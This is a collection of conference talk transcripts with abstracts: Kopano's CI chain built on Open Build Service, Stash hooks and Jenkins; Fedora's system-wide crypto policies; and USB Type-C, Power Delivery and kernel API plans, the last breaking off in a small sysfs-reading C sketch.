Bitbucket it's called now). So essentially what you need to do is just set up a curl call. I have --insecure here, for if you have a self-signed SSL certificate; you're sending a POST, and you're using a token. And this token has to be created beforehand. This token is really awesome, because you don't have to have usernames and passwords and share them all around. Of course you can use those as well; then you just replace it in the URL. But if you want to have something like services doing your job, then you don't want to tinker around with all kinds of username and password combinations. So this token is quite efficient. This is like osc service rr, which is remoterun. And essentially that's what's happening: you're committing something, Stash has a post-receive hook, sends it over, and then OBS rebuilds automatically. The good thing about that is, yeah, that's like the first step of continuous integration. For every commit that you're doing, you have your first step: everything that is done, I have a build for it. Then the next step for us is Jenkins.
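Before coming to that, here is a minimal sketch of what such a hook can look like. The API host, project, package, and token value are placeholders; the mechanism itself (osc token and the /trigger/runservice route) is the standard OBS token mechanism, and triggering it has the same effect as running osc service remoterun on the package.

    # done once by a developer: create a token bound to the package
    osc token --create Kopano:Core kopano-core

    # post-receive hook on the Stash/Bitbucket side; --insecure only because of
    # the self-signed certificate on the private OBS instance
    curl --insecure -X POST \
         -H "Authorization: Token THE_SECRET_PRINTED_ABOVE" \
         "https://obs.example.com/trigger/runservice?project=Kopano:Core&package=kopano-core"

OBS then re-runs the source services for that package, fetches the new revision, and rebuilds it for every configured repository.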
So, in our opinion... I mean, we used Jenkins beforehand, by the way. We had chroots, static chroots, and we did all the builds there. The source code was packed, sent to one of the nodes, unpacked, compiled, we got the results, and voila. Jenkins is very powerful, but it lacks in certain areas, like scalability; yes, you can add worker nodes to it as well, but it's not really the same as OBS, because you have to set up all your sources, everything, you have to manually set up every distribution on your own, and that, in our opinion, was just stupid. So in the end, integrating with Jenkins was the next step for us. We have code, we have the builds, but what happens next? And what happens next is that we just wanted to make sure that, for instance, unit tests (and in the beginning unit tests, I'm coming to that later) and Selenium get run, because we also have WebApp, a lot of JavaScript there. So we wanted, or were looking for, sort of a hook which, when builds have been successfully built and published, takes the next step. That's step three, essentially. In Jenkins, you create your job, you create a build token there, that's built in, nothing special to do; you can just search for the token setting in the job which you want to create. And then in /usr/lib/obs/server/BSConfig.pm, you just add this line for all the repos that you have. It's literally just an array, so you can add as many as you want to. That's just an example here. And you create your reference job; of course, you can make that parameterized, I mean, developers can do whatever they want to, but this is just an example to say: hey, in the end I'm just doing a curl request, and this curl request is sent to Jenkins. We had been thinking about this for quite some time, because we were thinking, yeah, you can just monitor the OBS build, right? You can just run osc results, see what's going on, and just wait. But that's more the polling principle, and we don't like polling; we think an event is way more efficient, doesn't use that many resources, and just makes things less error prone. So that was the way we did it. Yeah, next thing: what do you do when you have everything in your Jenkins, which you can trigger all sorts of tests from? You also want to make sure that you have images. The cool thing is, it's a no-brainer, actually. You can just take the standard .kiwi files that are in the GitHub repository, which you can see here. There are a lot of standard templates that you can use for RHEL and for openSUSE. You sometimes have to change them when you have your own private instance; you have to change the URLs, because they just point to OBS repositories. And if you in fact have the same product multiple times, then you don't want to use it that way; you just want to specify a certain project, or a certain package in a project. And therefore it makes sense to look specifically at the repositories area in your Kiwi XML. I just learned here at the conference, actually, that Jan Blank was busy with live-build-on-OBS integration, which is super awesome, because we've been looking for that. So this is one of the next things on our list, to really make Debian and Ubuntu images as well. And then we have all the major players, right?
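To make the hand-off to Jenkins concrete, here is a rough sketch of the two pieces described above. The repository names, the Jenkins job name, and the token are placeholders, and the exact BSConfig variable for the publish hook should be checked against the BSConfig template shipped with your OBS version; treat it as an assumption here.

    # Excerpt from /usr/lib/obs/server/BSConfig.pm (Perl): call a script whenever
    # one of these repositories has been published
    #   our $publishedhook = {
    #     "Kopano:Core/openSUSE_Leap_42.1" => "/usr/local/bin/notify-jenkins",
    #     "Kopano:Core/Debian_8.0"         => "/usr/local/bin/notify-jenkins",
    #   };

    # content of /usr/local/bin/notify-jenkins: kick a Jenkins job that has
    # "Trigger builds remotely" enabled, using its build token QA_TOKEN
    curl -s "https://jenkins.example.com/job/kopano-core-qa/build?token=QA_TOKEN"

This keeps the whole thing event driven: OBS publishes, the hook fires once, and Jenkins takes over the non-OBS QA jobs.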
That helps us, of course, to transport the product that we have in an easy, sane way, because Kiwi gives you a lot of possibilities to also integrate logic in terms of the configs that you want to deploy. For instance, using Kopano with a standard MySQL configuration works, but it's not a good idea, because you have many ways to improve performance just by adding two or three parameters, and you get magnitudes better performance without endangering any data. So the next thing was, obviously, for the trigger to run you should use service files. And I must say, from what I also see on build.opensuse.org, I'm quite astonished that _service is not really used that much, though it's such a great architecture. It's pluggable, literally. You have all these services, like tar_scm and recompress; you have all these service projects on GitHub, which are really great. And you can just add one service name after another, block by block. And here you can see a real example, except for a username and password; here you can see really everything that we're doing. So we get the master revision for every build that we're doing. Of course, we're not releasing master directly to the public as a release, so we have other jobs where it's tagged specifically, where we set the correct tag that should be checked out. And of course recompressing it, using xz for size, and set_version, which is, by the way, really awesome. Also, the changes that I showed you regarding 1A and Collax can support set_version as well, which is really good, because it just takes the version numbering that you have in your source code management tool and sets that dynamically in your DSC file, spec file, build collax file, whatever you have. The next thing is a little bit the convincing part: osc, that's the openSUSE Commander. And I'm not saying that in our company we don't like openSUSE, or that there's anyone who doesn't like it, but they simply don't know it. And the first reaction was like, yeah, what is osc? I don't know it, I haven't touched it. And the excuse was, yeah, that's openSUSE, right? And I'm on Debian. So there are no excuses, essentially. And I have to apologize, this is a Windows laptop here, because we're in the communication world, and in the communication world Outlook is also a thing. So there you go. But you can easily get osc to run even on Windows with Cygwin. The only thing I recommend you do is really follow this how-to, because the natively installed Python that you get with Cygwin, at the moment at least, is without SSL support; the PycURL there is without SSL support, and that's obviously not a good idea. Yeah, so with these instructions you can get started. Yeah. Be fast. Very, very fast. As I mentioned, when you do a build for every commit and you have a lot of developers, then you want to make sure that your builds are fast. The cool thing, and a really awesome point, is that you can kill every problem in OBS with hardware. So if it's slow and you have a lot of builds, a lot of distributions (you've seen the list that we have), then you must know: every distribution, every architecture means a rebuild from scratch. Reinstall the full operating system, put your artifacts in there, compile it, get the build results, push them. And that for every distribution. So every commit that is issued at Kopano generates 25 from-scratch compilations of 600,000 lines of code. You need hardware for that.
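Coming back to the _service file mentioned a moment ago, here is roughly what such a setup looks like. The repository URL is a placeholder for the internal Stash/Bitbucket server; the services themselves (tar_scm, recompress, set_version) are the standard ones from the openSUSE service packages.

    # inside a checked-out OBS package: create the _service file and commit it
    cat > _service <<'EOF'
    <services>
      <service name="tar_scm">
        <param name="scm">git</param>
        <param name="url">https://stash.example.com/scm/core/kopano-core.git</param>
        <param name="revision">master</param>
      </service>
      <service name="recompress">
        <param name="file">*.tar</param>
        <param name="compression">xz</param>
      </service>
      <service name="set_version"/>
    </services>
    EOF
    osc add _service
    osc commit -m "fetch sources and version from git via source services"

For a release job, the revision parameter would point at the release tag instead of master; set_version then writes the resulting version into the spec, dsc, or build collax file at build time.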
So one of the things that we actually did was to build everything in tmpfs; that works quite well. The only thing we also realized, because as Zarafa and Kopano we are also involved in the Iridium project, that's a spin-off of the Chromium browser which is just very secure, but we're talking about huge source code there, and this size isn't enough anymore. So 60 or 64 gigabytes is not enough there anymore. But for us, of course, it's still cool. And you can actually tune it, because every worker... when you have a system with, let's say, 16 cores, you could say, let's run eight workers there, and that means at full load literally every job would have two full CPUs available. And you can see how much space you're using, literally, because it's just like checking your df output for how much is really used at that time. And then you can tune it and see how much tmpfs you actually really need, because you don't really need it all the time; but of course you're installing the full distro in there, and therefore you need some size. Also, since we have some separated worker nodes, so they're not all at one location, really use the OBS cache directory and cache size settings here. It really helps, specifically for locations without super bandwidth. And the footprinting and the checksumming, we never have issues with that, so I really recommend doing that. And what we also did is some benchmarks regarding overcommitting. So to give you the idea again: we had these 10 nodes, I think, every node with 16 cores, and we have eight workers on there, so potentially thinking two CPUs for each and every one. So you would say, yeah, make -j2 or so, and then you have full load. But that's quite stupid. Because when you only have one or two single rebuilds, say a developer is just checking something for a specific platform, just wants to see the current log of it, and he triggers a rebuild for only one distribution, then that node would just utilize two CPUs, even though much more would potentially be available on whatever node it gets dispatched to. Therefore, just do a full make -j with the whole worker CPU count that you have, and yeah, just let the jobs fight for CPU cycles. In the end, the benchmarks look very good, so in total you win. Yeah. Do QA, that matters. So we had the thing regarding unit tests. We have quite an amount of them, because MAPI is a very complicated kind of technology, let's call it that. So MAPI with time zone issues, with all kinds of MAPI properties, with all kinds of operations like deleting and moving: it is absolutely necessary that you have unit tests for a product like that. Therefore, our idea was to make the make test happen on OBS workers as well, because that scales super well. And with these tests, you also take all the components and all the dependencies of that certain distribution into account. Beforehand, we did it like: one node, or one Jenkins job, do the unit tests in there. And it was Debian-based, or it is Debian-based, actually, still. And then you fire it off, and then you know, yeah, my unit tests are working on Debian. But you don't know if they're working on SUSE, you don't know if they're working on Red Hat. That just doesn't make sense. Yeah. The example that I already brought, integrated with the published hook, that is really, really the best.
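The simplest way to get those unit tests onto the OBS workers is to run them inside the package build itself, so they are executed once per distribution and per architecture. A minimal sketch (the make target is whatever the project's test suite uses; for the Debian-based targets the equivalent hook would be override_dh_auto_test in debian/rules):

    # excerpt from the RPM spec file
    %check
    make test

If the tests fail, the whole build fails, so a broken commit never reaches the repositories, and you see immediately on which platforms it broke.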
It's so awesome, because you can really make sure that you're not missing out on any commit, and you get the results for every commit. Of course, you have to back it with hardware. But in the end quality gains from that, and actually developers also learn from that, because in the beginning we also had issues where there were like 10, 20 commits happening in the meanwhile, and then we were thinking like, hey, damn it, we touched that three times, which commit is it now which is fucking up the test. So the point is, if you have that for every build, you are increasing quality, and your developers are also learning from it, because they can really pinpoint it, and you're saving time in the end as well. And yeah. Kiwi is also something whose value is very, very much not really well perceived. With this whole Zarafa and Kopano thing, where essentially all the services are now named Kopano, we had issues with upgrading and with dependency problems, from package to package to package. So what we had was essentially: we installed like 80% of everything correctly in the beginning, and then we realized, oh, damn it, there are like two or three older packages actually, but they are not included really well, and they ask for dependencies, because we also sort of have to have manual references, or manual Requires, in the spec files. So Kiwi is a perfect automation tool for all your installations. If you want to install something and you just define your target, we have a meta package called kopano-server-packages: if you just install that and you know that your image build is running through, then you know you have no dependency issues, because it installs. So therefore no install issues whatsoever. Of course, you can take it further and say: what about the next version? If you change a library to be contained in a different package, then you have to think, hmm, then I have to have upgrade tests as well. Coming to that later. So yeah, openQA is there, and it is really great. We really took our time to look at it. But for us, it is really this making a screenshot, comparing a screenshot with another. It works in many cases, but not the ones that are important for us, at least. So we actually evaluate our test output, and this output is quite important for us. So we do a little bit of magic around that, and we just rate that, for us at least, as way more efficient. Not saying that openQA is bad, really, I don't want to say that, but for us it was not a perfect match. Doing platform-related tests is also a very, very good and important thing. With Jenkins we also thought, yeah, let's just do the unit tests initially, as I mentioned. And one of the things that got left behind is also PHP, because PHP also has different major versions. And with this broad number of all kinds of different distributions, you have to make sure that the unit tests also run on every platform. So everything that is dependency or platform related is something that OBS can entirely make work for you. And also, which is quite nice, the published hook, which I already mentioned that I love, also works for everything that is Kiwi related. So to get the full chain: a developer commits something. When a developer commits something, OBS automatically picks it up, because we have this hook that starts the build in OBS. OBS uses the _service files to automatically grab it from the source, from the SCM, from our Git, and automatically deploys it on a worker and rebuilds it.
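As a small excerpt of what such a Kiwi image description can look like for this kind of installability test: the project path and package name are placeholders; the point is simply that the image build pulls the meta package from the freshly published OBS repository, so any broken or missing dependency makes the image build fail.

    <!-- excerpt from the Kiwi config.xml of the test image -->
    <repository type="rpm-md">
      <!-- on a private instance this would be the instance's own project/URL -->
      <source path="obs://Kopano:Core/openSUSE_Leap_42.1"/>
    </repository>
    <packages type="image">
      <package name="kopano-server-packages"/>
    </packages>

Because the published hook also fires for Kiwi results, the same event chain covers the images as well.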
When it's rebuilt, it automatically tells Jenkins: hey, guy, you have something to do. In parallel it also tells OBS: by the way, I have a new package for this, and I want to have an image of it. So Jenkins is one bulk part where we put all the other QA jobs into. Here we have everything regarding non-OBS QA-related jobs, and there are some. For instance, we also use Valgrind, and running Valgrind on a non-realistic system that you are footprinting or so just simply doesn't make any sense. So therefore you have this full chain: a developer commits something, OBS takes it on, Jenkins is notified, hey, we have something new. Jenkins is also, by the way, the guy who takes care of all the translations. So when somebody translates something, we have a job that just recurrently picks up all the translations, puts them into a big bucket back in a separate branch, and the developer can just merge it. So in the end, with Jenkins taking the next steps here, we have these non-OBS QA jobs, which simply don't make sense to do in OBS. Then we have the manual part, where we say, hey, there's some sort of QA that comes after that. Here, to be honest, we cannot do it for every commit, obviously, but already this chain of our unit tests, for instance, being executed in line with every build is a big relief. Yeah. And if QA is not happy, you can see this not-happy software tester. He is upset because of your code; it says so below, if you cannot read it. Yeah. So that's the whole chain that we established. Yeah. I think... great. If you want to know what Kopano is all about, just out of curiosity, I have a workshop tomorrow, three hours, where you can really see a full setup from scratch. If you bring a laptop with you, VirtualBox, whatever, we can set it up together, and you would have a real, full communication stack which communicates with your mobile phones and Outlook and so on. Yeah. I think that shows quite well how we use OBS. Questions? No. All right. I'm still hanging around, so if there's anything that you want to come up with, just approach me. Thanks.
OBS (Open Build Service) is an awesome piece of software which is as yet unmatched by other available software suites. This talk shows how Kopano approached the change in their build system, and how they integrated fully fledged build requirements into OBS. From adding real custom distributions such as Collax (just using DEB, without bootstrapping at all) to integrating with Atlassian Stash: all this is possible with OBS, and much more. How did we make OBS accessible for Windows users (using osc)? How did we make sure we have a sane structure based on build-time requirements for packages, rather than just including everything for a distribution in the end? Where can curl requests be used, and how are they structured? And did you know there are authentication tokens? This talk delivers the answers to these questions and includes a Q&A session at the end, with the chance to get answers on many (unfortunately still undocumented) features.
10.5446/54606 (DOI)
Hello, I am Nikos Mavrogiannopoulos. The purpose of this talk is to explain why we need system-wide crypto policies and to show what we have built. I cannot really see you, so if you want to ask something, feel free to interrupt at any point. What we will cover: I will give you the motivation for why we need a crypto policies system and the basics behind it, what the current design looks like as we have it in Fedora, the problems we ran into, the lessons learned, and our next steps. A few words about me: I work on crypto libraries, my projects include GnuTLS, and I have contributed to others as well. So let me start with the system-wide crypto policies in Fedora, and first with the motivation. Who needs this? Think of an administrator who has to run a system that communicates with other systems, using applications like curl, wget, Firefox, Apache, SSH, OpenVPN, or many of the other tools you will find in a Linux distribution like Fedora or openSUSE. The question is how the security of these applications is actually configured. If someone serves content with Apache, what security level does that connection have, and who decided on it? As an administrator I may know how to configure one of these applications, but I do not know about the others. So the next question is how we can ensure a consistent security level across all the applications in the system and across all the libraries they use. That is the problem the system-wide crypto policy tries to address: one policy, applied to all the applications in the distribution and to all the crypto libraries. I would like the policy to be decided by the distribution and by the administrator of the system, not by each application's developer. As an example, we have applications that hard-code AES-256, whether that is what you want or not. We have other settings that are hard-coded and that you simply cannot change.
What we found is that we really only needed one central place for these decisions. In Fedora 22 we already went through this with SSL 3.0: we decided to disable it and we rolled that out across the distribution. Some application developers had made these settings configurable so that their users could adjust them, but if you are putting a distribution together at a large scale, like Fedora or openSUSE, you do not want every application to behave differently, because you cannot know what each one of them is doing. That is something we tried to address. It is easier to see the details in the slides. After the change we made for SSL 3.0 we had a precedent: a setting that is controlled from one place in the distribution, instead of having to patch every application that we ship in Fedora. The same applies to the newer issues we have seen with RC4 or with the CBC ciphers, the same approach. And as I said, the parameters affected by Logjam would be handled in the same way.
As for Logjam, it is handled the same way within the policy. It is a somewhat different case, because the Logjam-affected parameters are largely in the hands of the application developers and their defaults; we do not have many problems with them, but it is probably a good idea to cover them in the policy as well. We have a tracker where you can see where we currently stand with the adoption across the distribution. I would also like to point out how much the policy has grown: when we started it was quite simple, and by now it covers a lot more, so any help is welcome. That is more or less the current state of what we have in Fedora, and you can see it there. And that is the end of my talk; if you have any questions, go ahead. On the question of applications that need something weaker, like MD5: for the policy to give you what you want, all the other applications have to follow it, and applications that really need an exception have to handle that mainly in the application, or in whatever is using the crypto library; we are also thinking about a per-application policy arrangement, where a specific policy can be applied just for one application. For those cases, if a new setting is needed, it has to come in together with the policy. On the question of library support: what we need is now in GnuTLS, OpenSSL and NSS; we carry that, and we are currently working with OpenSSL upstream on a few additional bits we may need. The other libraries do not need anything extra, and for what we do, we can cover all the libraries we want. Okay, thank you.
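As an illustration of how this looks from the administrator's side, Fedora ships this as the crypto-policies package; the specific commands below are not quoted from the talk, so treat them as an assumption about the implementation rather than part of the transcript.

    update-crypto-policies --show          # print the currently active policy, e.g. DEFAULT
    update-crypto-policies --set LEGACY    # allow older algorithms for compatibility
    update-crypto-policies --set FUTURE    # opt in to more conservative settings early

Each crypto library back end then derives its own configuration from that single setting, which is exactly the consistency argument made above.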
Currently each and every shipped application in distributions enforces its own policy on the allowed cryptographic algorithms and protocols. While for some this is a desirable property, for most non-UI applications and libraries in an operating system it creates uncertainty about the available security level. The purpose of this talk is to describe the approach we have taken in Fedora to counter the issue, by enforcing system-wide policies, to discuss the current outcome and lessons learned, and to invite openSUSE maintainers to participate.
10.5446/54609 (DOI)
Somebody give me some... yes. Okay, let's start, belatedly, but start. I'll be a bit faster then. Okay, I'm talking today about the Type-C plug and USB 3.1. And the main part will indeed be the Type-C connector, because USB 3.1 is boring: it's just a minor revision, basically faster, nothing more. So the Type-C connector is, well, a connector, but why another connector? Firstly, it's faster, and faster is always better. It's smaller, smaller than a conventional USB connector, not really smaller than a micro USB connector, but its main feature is its versatility. It can do more than just USB, and that is the reason people like it. It can do power and it can do other things, and it can do a lot of power. The obvious plan of that company, which makes a lot of products whose names start with an I, is more or less to make a universal connector. So what can it do? Faster USB, twice as much. It provides these things called the alternate modes; this is: we run something else than USB over the connector. It also provides support for something which is called an accessory, which is another way to run something else over the connector, in this case mainly sound. It's just cheaper. Again, a feature incorporated for the company whose products start with I. And you can put a lot of power over it, in fact 100 watts at the maximum. So it is also designed to unify and get rid of power connectors. It uses three main technologies for that: the Type-C connector itself, USB 3.1, which is interwoven in the specification in a rather complicated manner, and USB Power Delivery, which is not strictly speaking limited to the Type-C connector, but in practice is, and is indispensable for the operation of the connector in alternate modes. For USB, it works without. What does the connector do? It gets you a lot of data lines, different kinds of data lines. USB 3 and faster and USB 2 are physically separated. It gets you some pins dedicated to alternate modes, and it gets you a very diverse power supply. There is a power supply for the bus itself, and one for the cable, because the cables actually become active components under Type-C for most use cases. You can build a conventional cable out of copper which is connected through, and it will work for USB, and maybe alternate modes if it's very short, but that's it. So under Type-C, the cables themselves become gadgets and can be talked to in quite a bewildering number of ways. This connector is quite flexible. It can switch almost everything, again optionally. You can switch the communication mode, you can switch the mode in the sense of the alternate modes, the protocol you run over this thing, and it can switch the way you supply power over it. And during all this switching, it still retains a minimum USB 2.0 connection. USB, as you hopefully know, is a strict master and slave protocol. That property is retained. There is just a method to switch between master and slave on the fly, and the master is also that part of the connection which decides which mode is to be run over the connector. The slave says what it can do, and the master selects, and also has to make sure that the cable actually can do what it is required to do. For the power supply, under USB it is clearly defined: the master provides the energy, and the slave, if it wants it, can take it. If not, then it has to provide its own energy, and the master in every case has to provide its energy. Under the Type-C connector, and this is independent of USB, those roles can be switched over.
So it is possible to power a laptop, let's say, from the monitor. Let's get to USB 3.0... 3.1, I'm sorry, because it can be dealt with quickly. The raw speed: it's doubled, and that's it. The Type-C connector is not limited to USB 3.1 SuperSpeed, but that SuperSpeed is limited to the Type-C connector. So if you want the full 10 gigabits per second, you need a Type-C connector. In other features, it provides a bit more of what we already have. There is one major new thing that I can't cover because it's too new and has too many implications, and that is authentication: you can check that the device is actually what it claims to be. But I won't touch that now. To be noted is that master and slave are still distinct. So USB is obviously not peer-to-peer, but it would be possible, or thinkable, for a device to be master and slave at the same time. But no, that's not how it works. You can exchange the roles, but it only has one role at a time. The main technology, and the most troublesome part of the standard, is actually USB Power Delivery, which technically is not limited to the Type-C connector. It is defined for the usual A/B connectors, but deprecated, so in practice I doubt we'll see it. And it is not limited to USB. It is also used for power bricks, and if they are to deliver more than 15 watts, it's not just available, it's then mandatory. If you use it and are ready to ramp up the voltage, then your limit is 100 watts. If you do the math, that's 5 amps, if the cable does it, but we'll come to that. It is also used in those famous alternate modes, which I will come to. But let's explain: one of those alternate modes is DisplayPort. So you can run the DisplayPort protocol over a Type-C cable and still use the power brick of your monitor as the source of the power supply for your system. And then the monitor and the system must negotiate what's called a power contract, so that the monitor can properly budget its power and share it out, because the monitor might also contain a USB hub or something, which then would also be driven. If you use it for USB, the power budgeting goes down the whole tree over the hubs. If you use the alternate modes, that's not the case, with the one exception of USB bridging, which allows you to run a subset of the power delivery protocol to the next level in a hub. But we'll come to that. The hubs, and that's the nice thing about the protocol: you can ignore the feature. Then the hubs are on their own and must implement a limited amount of power budgeting. And if you don't like that, you can switch the hubs to the fully dependent mode, and then every request is rerouted to the host, and it has full control over the power budget in the system as a whole. How does it work? The power delivery thing on a technical level is actually most similar to a very primitive Ethernet. It's implemented technically as a frequency modulation on top of either the power supply or a control cable, so it's arcane. It is, in contrast to USB, a truly peer-to-peer thing. In the protocol, every partner on that wire can talk to the other one. And there are, at a maximum, actually four partners on each connection. Yes, it is point-to-point, but one partner is the host, the second is the device, and, this is not a joke, both ends of the cable, which results in a maximum of four partners. Yes. Each command is immediately replied to with an acknowledgement, which just means understood. There's a CRC involved, and the graphic I showed you was more or less the simplest exchange.
There is a command and a response. The understood message has a very tight time limit, 15 milliseconds, so we absolutely cannot do that in user space, because failure to meet that time limit leads into the error handling, and that has very serious consequences. We don't want that. So this is either in kernel space or, in many implementations, part of the power delivery protocol is in firmware on an ACPI embedded controller or something similar. That is something we have to keep in mind when we come to the API we can make. But let's get to this later. There is, for the API design, a further thing that we have to keep in mind. The response is usually yes, no, or later. Yes and no are rather obvious. The later part allows us to make a callback from the kernel into user space and let user space set a policy, or to delay the kernel's action until user space has set a limit or a policy. What does USB Power Delivery do? It defines ways of controlling how power is distributed and delivered. One of the features is that we can go over five volts. A USB-C cable is in every case limited to five amps. So if you do the math, if you stay at five volts, you arrive at 25 watts. And if you ramp it up all the way to the maximum allowed voltage of 20 volts, you arrive at the whopping 100 watts. The actual selection is done by finding the greatest common denominator between the host and the device, where both sides advertise what they can do. And the actual choice is made on the device side, and the host then has the choice between taking the offer, or rejecting it and starting new negotiations, or letting it fail. It is also used for switching the data roles on the Type-C cable. So you have to implement USB Power Delivery even for that most basic feature. Beyond the simple faster connection there is cryptography: the authentication is again not limited to USB. It can also be done in the alternate modes, and indeed in theory you can authenticate that your power brick is indeed your power brick, for whatever that may be useful; I have no idea, but it's possible. And believe it or not, you can use USB Power Delivery to update the firmware of your power brick. Yep. But still, in fact you can even update the firmware of a cable. Yes, sorry, but that's the spec. Power delivery is also used to enter and leave the alternate modes. It also does the not-so-hard part of the error handling, and it's used to ask the cable about its capabilities, which is: how much power can you deliver, which alternate modes do you support. This is not actually so trivial, because the spec now also defines optical cables for USB, so we need to know that. Power delivery has the main function of, well, not main, but according to its name, the function of providing power. Power management with a Type-C connector is different from power management with earlier USB. In runtime power management with earlier USB, we are concerned with conserving power: it's good if we can save power, but still the system has to work without doing so. With Type-C, if you get all your power over a Type-C connector, you can obviously not deliver the same amount of power over more than one Type-C connector. In fact, the system itself will consume some power, so you can't even deliver the same amount of power. Or, if you don't go to the highest voltage: your laptop is not going to provide, say we have six ports and each is supposed to provide 15 watts, not in battery mode. I'm sorry, not going to happen.
So we negotiate what is called the power contract between the master and the slave, which again is done by comparing offers and letting the slave decide which to select, and the master decides whether to take this or start a new negotiation. The master must be sure that its commitments do not exceed its capabilities, which would be trivial except for one additional complication. A USB Power Delivery device can express its maximum energy need and its current energy need, which means that it is in principle possible to overcommit power and manage this on the fly. This is a feature the host must negotiate, must guarantee, or leave to the hubs in the case of hubs, but it has very serious consequences for the architecture if we decide to use this feature. We can obviously decide not to overcommit, but then we risk that our devices won't run, because we can't meet their combined maximum power limit. They can also say: we use this much power at present, but we are able to rapidly decrease our power needs. This is intended for devices which are charging their internal batteries from power delivery, and this feature can be used in kernel space and in user space to power down some devices to meet the power consumption of another device if it goes into peak mode. The policy for that is a bit involved. Alternate modes: this is, in my opinion, and probably most people's opinion, the killer feature of the Type-C connector. This is designed to provide a universal connector. We've seen it does faster USB, which is good, but it couldn't be a sensation. It can be used to get rid of the power supply, it can be used to get rid of proprietary power plugs. Also nice, not a sensation. I think in the long run we will see that most connector types other than Type-C will die, because it's rather expensive to develop something which is hot-pluggable, fast, durable, and so on. There has to be a reason for somebody to spend that much money, and it has to provide an additional benefit. If you can run your protocol over the Type-C connector, then I guess there's not much point in that. If I have to make a prediction now, and I'm going to do so voluntarily, I'd say Type-C will survive, Type-A will survive, because it's much cheaper and nobody really cares about his mouse; it's got to work, no reason to do fancy power delivery or so. I guess the Ethernet connector will also survive, and probably the ExpressCard connector, but beyond that I'm actually skeptical. Anyway, so which protocols are defined? For now, DisplayPort, Thunderbolt, PCI, and MHL. MHL, and don't be disappointed, I had to look that up myself, is a video protocol which more or less ends up in HDMI. It's used to connect mobile phones to TV sets, but okay. The physical protocol is run over the wires in the cable. They can be switched. There is an actual multiplexer in the Type-C assembly on your motherboard which allows you to physically reroute the cable or parts of it. So you get a direct connection from, let's say, your GPU or your Thunderbolt controller to the other side of the Type-C cable. And how this is controlled, I will come to in a moment. So it is not in all cases defined to have a Type-C connector for this. It is defined now for Thunderbolt 3, where it is mandatory, and it is defined for DisplayPort.
For the other cases, we have what we are calling the alternate mode adapter, which is kind of a Type C to something else cable, like a real DisplayPort or an older Thunderbolt. So we have this kind of cable where we are talking to the plug instead of the device with the USB power delivery. Let's see how I run time. Okay. On the architecture level, we have more or less decided to see the Type C thing as a bus, as a bus without I.O. And what we use it for is more or less the hot plugging and the interrupt and error handling capability and the power management capability of a real bus in the device model. So if you switch your port to an alternate mode, let's say DisplayPort, you will get a real kernel hot plug event for your now DisplayPort monitor. So how do we control this goodness? There is basically an infinite amount of possibilities, which doesn't make it good. So the easiest thing would be to use ACPI. There is a standard called the UCSI, which allows us to use most, but not all features of the power delivery protocol. Then there is, we can go to the really defined bare bones of the hardware, which is an I2C bus, which connects all the ports to one master controller, has defined commands and so on. The problem here is if we do the voltage selection wrong, then we have a real problem. Devices are supposed to withstand 20 volts, but I am quite reluctant to put this theory to the test. And the few Type C drivers we have actually seen besides UCSI are unfortunately of yet another kind. They are a mixture of additional vendor specific registers on XHCI controllers and platform devices. Not good, but we will probably end up with a half a dozen or so at a minimum of Type C drivers, which will plug into the kernel into the generic layer. Okay, then let's see in the kernel. What do we have? Okay, the good news, USB 3.1 is finished. There are bugs left, obviously, and it's not quite so stable, but it's there. It works. The user space support is also there. Done. Great big cool. That is good, but not interesting. So the Type C connector itself. We have the UCSI driver. I hope and presume that Intel has tested it, but nobody obviously without a firmware can test it. So shit. It does the basic job and that's it. TCPM, now we will have to do this, but this is going to take some discussion. There is a generic Type C bus type, which is in the kernel. There's the plug in to the individual drivers, which at least for what Intel has now is working. And there is an API to user space for using this whole stuff. So what possibilities do we have? We have now decided to split the alternate mode and the power delivery stuff in the narrow sense in two and to implement only the mode selection and the data role selection and so on under the Type C bus, because this is a split that is more or less forced upon us by the UCSI driver. That's how it works. And if we are going to see power delivery in the narrow sense being implemented in microcontrollers, we cannot put this into this directory. And frankly, we are not at the point where we could set an API for this in stone. So we don't do it. Power delivery is quite hard, because on the one hand, it has got nothing to do with USB. And on the other hand, it is implemented in USB because the hubs do it. So we are facing the ugly choice here of implementing it more or less with two APIs that is implementing it in the root app as an emulation like we do for root apps in USB in general, or to do something else. So any input here is appreciated. 
But I must say we are even now discussing the final touches of the alternate mode API. So power delivery API will have to wait. It also imposes on us a policy problem. There are several ways to get more power for our system. We can obviously request more from our power source if that is power delivery. We can tell devices to use less power. Or if there's a peak load, we can even wait and hope that the second peak load won't be necessary until the first peak load goes away. And if that's not the case, wait for it to pass. So this needs to be implemented. I talked in the beginning about accessories and we've decided to leave this to Alsa. I see a head shaking there. Could have thought so. Anyway, there is also a debug accessory, which is quite ill-defined. No idea. These are basically clutches invented for the company whose name I don't use here, so they can make very cheap headphones for their phones. It's part of the standard. So our API. What do we have? Nothing. In the sense that of what is in the kernel. Then there is a really big nothing. We have an API draft, which is almost finished and could go into 4.8, which is an API for the alternate modes, the mode switching and so on. That is working. For now, it looks like we are going with this split of the APIs. If somebody wants something else, he should speak up this week or it's too late more or less. We have not yet decided how we do the other way around. That is not tell the kernel to do things, but to be notified from the kernel about what's happening. What's happening on the bus is errors and the bus has a virtual, in principle, even vector interrupt capability. In that case, we've not even decided whether we should export this to user space. The current thinking is no, we should not. The same thing goes about resets. We do have a lot of things which are more or less decided. The whole thing is to be built in CISFS. If we can avoid it, there won't be an alternate modes tool or a USB PD tool. If at all possible, we are going to leave this in user space and if we are going to write such a tool, it's strictly for convenience, not really necessary. We're going to export this as directories purport with a lot of subdirectories which will list the available modes, the attributes, and so on, and the power delivery attributes. We've also decided, and this is a bit problematic in the graphics case, that an alternate mode will, in every case, need a kernel driver which is responsible for power management, error handling, and hot plug. That means that we have to find a way to get at least hot plug events for monitors from this driver into the graphics drivers. That much is clear. What is also not set in stone is the problem with the booting. We as a distribution probably want to be a master, but that's not something we can put into the generic kernel. At the same time, USB ports have to be enumerated before we load the INIT RD, at least in potential. This is possible. You can statically compile the USB core module, and that's a feature that's going to stay. We need to express to the kernel at that stage what do we prefer? Do we want to be a master if we can't do? Or do we insist on being a master and reject the other side if it also insists on being a master? These are possibilities which we need to express, and this probably means we are going to introduce module parameters, which is not nice, but I see no other option. We are also missing a good deal of stuff in user space. The obvious thing is GUIs. 
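Since the sysfs layout was still being finalized at the time, here is only a hypothetical sketch of what a small user space helper reading such a per-port directory tree might look like. The path /sys/class/typec and the attribute name data_role are assumptions chosen for illustration, not a description of the final ABI.

    #include <dirent.h>
    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
        const char *base = "/sys/class/typec";   /* assumed location */
        DIR *d = opendir(base);
        if (!d) {
            perror(base);
            return 1;
        }
        struct dirent *e;
        while ((e = readdir(d)) != NULL) {
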